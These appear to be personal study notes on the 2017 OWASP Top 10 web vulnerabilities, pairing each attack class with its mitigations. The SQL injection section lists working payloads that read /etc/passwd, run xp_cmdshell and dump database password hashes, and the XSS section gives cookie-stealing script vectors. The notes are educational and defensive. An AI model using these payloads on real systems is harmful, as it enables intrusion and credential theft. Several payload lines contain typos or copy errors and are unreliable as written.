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OWASP Top 10, 2017

Open Web Application Security Project (OWASP) Top 10



SQL Injection

The front end passes parameters to a backend system. The backend system executes SQL-style database commands with these parameters.


Front-end with GET request parameters:

Vulnerable backend code:

SELECT user_id, recent_playlist FROM Playlists WEHER user_id=xyz

Proof of Concept Attack

Front-end query AND DROP TABLE Playlists;

Backend code:

SELECT user_id, recent_playlist FROM Playlists WEHER user_id=xyz AND DROP TABLE Playlists;
Advanced Injections

Goes beyond just affecting the Database and can start executing commands on the backend server. Consider the following queries:

Reading file data from the OS UNION SELECT LOAD_FILE('/etc/passwd') UNION SELECT 'File Content' INTO OUTFILE('tmp/file');

Executing commands on the backend OS UNION SELECT LOAD_FILE('/etc/passwd') EXEC master.dbo.xp_cmdshell 'DIR';

Real attack considerations:

  • Force Error. An easy check to see if this can be done is by using ' OR '1' = '1 or something like OR abcd'. Ideally, this should return error from invalid username, but if it doesn't return an error, returns other errors (eg incorrect SQL syntax), or describes the error in detail (eg. unterminated quote string at or near "abcd'" UNE 1: SELECT ... abcd'"<), you probably can do the attack.
  • Identify attack -- Explore the attack space to get meta information that can be used for the final attack. For example,
    • get DB version: abcd' UNION ALL SELECT NULL, (SELECT version() leverages that the regular query returns 2 columns, hence formats it accordignly to ensure union also has 2 columns
    • get current user: UNION SELECT LOAD_FILE('/etc/passwd') UNION SELECT 'File Content' INTO OUTFILE('tmp/file');
    • abcd' UNION ALL SELECT NULL,(SELECT current_user)—
    • abcd' UNION ALL SELECT NULL,(SELECT getpgusername())--)
    • get DB settings like port: abcd' UNION ALL SELECT NULL,(SELECT current_setting('port'))--
    • get encryption status: abcd' UNION ALL SELECT NULL,(SELECT current_setting('password_encryption'))--
    • get config:abcd' UNION ALL SELECT NULL,(SELECT current_setting(‘config_file'))--
    • get host-based auth file: abcd' UNION ALL SELECT NULL,(SELECT current_setting(‘hba_file'))--
    • get data directory: abcd' UNION ALL SELECT NULL,(SELECT current_setting('data_directory'))--
    • get all db users with their passwords: abcd' UNION ALL SELECT NULL,(SELECT concat(usename,' : ',passwd) from pg_shadow)--
    • get table names: abcd' UNION ALL SELECT NULL,(SELECT string_agg(table_name,', ') AS tables_list FROM information_schema.tables WHERE table_schema = 'public')-- (for example, the attacker might now know that the name of the table is 'Playsists')
    • get columns of the user table: abcd' UNION ALL SELECT NULL,(SELECT string_agg(column_name,', ') AS columns_list FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'ctf_user')--
    • get user and password hashes: abcd' UNION ALL SELECT NULL,(SELECT concat(email,' : ',password) FROM public.ctf_user where id=2)—


  • Input data validation, especially input data that has a contact point with the DB.
  • Parameterized queries
  • Never run db with priviledged roles/users
  • User Object Relation Mappings (ORMs) that have validator functions for loaded variables.

Server-side JavaScript/Template Injection

Whenever server-side process/OS runtime interacts with a user's input, a malicious user can use their input to inject unwanted behavior. Often, remote code execution flaws in NodeJS (or other popular libraries) can help the attacker run remote code. Typically, happens with the use of eval() in JavaScript.

Along similar lines, the use of template in html webpages (eg. {{ item.href }}) when unvalidated and used alongside user input, can trigger Template Injection attacks.


  • Input Validation
  • Safe APIs to make OS calls/commands
  • Avoid user-input from directly interacting with template variables.
  • Restrict permissions on backend applications -- effectively reduces attack surface.

Cross-site Scripting Attacks (XSS)

An attacker can via input variables or phishing make a web-site behave in undesireable ways. There are braodly three types of this attac:

  • Reflected XSS Application input directly reflected back to the user. For example, taking as input a name and upon doing so, the variable is used on the page.
  • Persistent XSS XSS that gets stored into the database and reflected back as and when invoked. E.g. XSS injects as username, shows up when admin user wants to view all usernames from the admin page.
  • DOM-based/Type-0 XSS The xss manipulates the dom objects on the browser without even reaching the server.

Attack Vectors

  • <script>alert(1)</script>
  • <script>alert(document.cookie)</script>
  • javascript:alert(1)
  • alert(1)
  • ><scr ipt>alert(1)</s cri pt>
  • <BODY ONLOAD=alert('XSS')>
  • <BODY ONLOAD=document.location = ‘http://’>


  • Input Validation
    • OWASP Java Sanitizer
    • Python - Bleach
    • ASP.NET - Anti-XSS, HtmlSanitizer
    • Ruby on Rails - Rails SanitzeHelper
    • JS/Node.JS - Bleach
  • Encode/Escape Output
  • Auto-escaped templating systems (Go Templates, jinja2, django template)
  • Implement content-security-policy
  • Add session Flags -- HttpOnly prevents Client side token access
  • X-Frame options -- ensures i frames from outside the origin cannot be loaded in the context of the application
  • Security Headers
    • Python Flask Talisman
    • Node.JS Helmet

Broken Authetication and Session Management

There are several causes to this attack:

  • Password retrival/reset mechanisms
    • Answers to qusetions asked can be found easliy by simply looking up google, linked in.
    • Secret answers should be encrypted/hashed in storage and transmission - similar to passwords.
  • Flawed Session Management
    • No passoword lockouts
    • No mandate password change requirements
    • No password complexity enforcement
    • Password remember functionality -- cached in browser
    • Weak Session tokens that are easily guessable
    • Loosely scoped session token (PATH, DOMAIN, Expire)
    • Insecure session Token (No HttpOnly, No SECURE Flag)
    • No session timeout

Attack Vectors

  • Session Hijacking
  • Session Fixation attacks
  • VERB Tampering

Cross-site Request Forgery (CSRF)

Can have the nature of a person-in-the-middle attack and works best when there is a state change such as:

  • Password change
  • Router/Firewall config change
  • Account transfer
  • Admin CRUD Operations of any kind

CSRF + XSS can results in comelet client-side control over the application such as controlling javascript code to authorize state change events.


Request Authenitcation

  • Use CSRF Token in GET and POST requests
    • Get request:
GET /index.php HTTP/1.1
{ Other Headers}
  • POST request:
<input type=“HIDDEN” name=“csrftoken” value=“adsa2131zxxz4222134324”>
  • Validate
    • Token for all HTTP request to the application - unique per user
    • Origin header
  • Same site session token header support
  • Ajax requests are a big red flag.

Example libraries:

  • Java - OWASP CSRFGUard
  • Python - Django
  • Ruby - RequestForgeryProtection

Security Misconfiguration

Causes and safeguards

  • Default vendor-supplied/weak passwords
    • Change them
  • Default vendor-supplied/weak open services
    • Proactively check of these and stop them if not needed
  • Unnecessary open services
    • Close them
  • Information disclosure -- common with headers
    • Only have information that is absoulutely necessary
    • Transmit sensitive information over encrypted channels only
  • Lack of security updates
    • Enforce regular updates
  • Lack of Network Access Control -- Firewall rules/Access Control Lists (ACLs)
    • Restrict permissions, configure authorization

Software - Vulnerabel Controls

  • Web and current day applications are built on top of several downstream libraries that may have vulnerabilities. For example,
    • Apache Commons COllection -- Java Deserialization Vulnerability
    • OpenSSL Vulnerability -- Heartbleed
    • CMS - Massive effect -- Wordpress, Drupal
    • Image Libraries -- ImageMagick, LibTFF
    • Font Libraries - Free type
    • Document LIbraries - Adobe


Insufficient Transport Layer Security (TLS)


  • Disable weak cipher suites in the Web Server/Load Balancer. List of secure cypher suites (2017)
  • Disable anything below TLSv1.1
  • Consider implementing HTTP Strict Transport Security (HSTS) -- https
    • Consider the query for user types to
    • Browser -- --> DNS Server
    • Browser <-- xx.xx.xx.xx -- DNS Server
    • Browser -- GET --> xx.xx.xx.xx:80
    • Browser -- GET --> xx.xx.xx.xx:443
    • Browser <-- cert -- xx.xx.xx.xx:443
    • Browser verifies certificate is
        1. Cryptographically sane
        1. Signed by a trusted Certificate Authority
        1. Carries the name
  • Watch out for the "Set-Cookie" event
  • Enable the SECURE flag on the Session Token

Insecure Direct Object Reference

The Model-View-Control (MVC) architecture of Web Apps revolves around having buisiness login as native objects called Models. Attackers can manipulate these parameters by removing or adding information (adds by guessing parameters).

Generally a workflow of Primary Key/Query tampering --> Insure direct object reference --> Mass Assignment

For example,

  • Search for a few hotel confirmation IDs on Google
  • Get urls and validate them storing the url with IDs that are valid hotel bookings
  • Use pattern matching logic to generate 1000s of new IDs
  • Query URLs with these IDs using an automated script

Simpler example: Modify to to get the log in page view for a new user (or update a health record with PUT request).


  • Test access control and enforce user permissions to objects on the system
  • Test authorization and permissions
  • Use un-guessable maps to reference objects - UUID4()
  • Userful libraries
    • Java - Apache Shiro, OWASP ESAPI
    • Python, Django - Django Guardian

Insercure Cryptographic Storage

Red flags:

  • Encryption
    • Proprietary (un-proved) encryption schemes
    • Weak key sizes or encryption modes - 3 DES Electronic Code Block (ECB), RC4
    • Hardcoded or easliy accessible key
    • Lack of key rotation mechanisms
  • Hashing
    • Unsalted hashes from MD5 and SHA-1 that can be compromised easlily


  • Encryption
    • Block cypher -- safe modes are CCM and GCM
    • Use strong encryption algos -- AES-256
    • Key Encryption/Wrapper Key
    • Moving Target key storage
    • Key rotation & key retirement
  • Hashing
    • Key Derivation Function as opposed to Hash Functions
    • Salting before hashing is necessary
    • Strong has alogs (SHA-224 & above)
    • Key derivation function lik bcrype or PBKDF2
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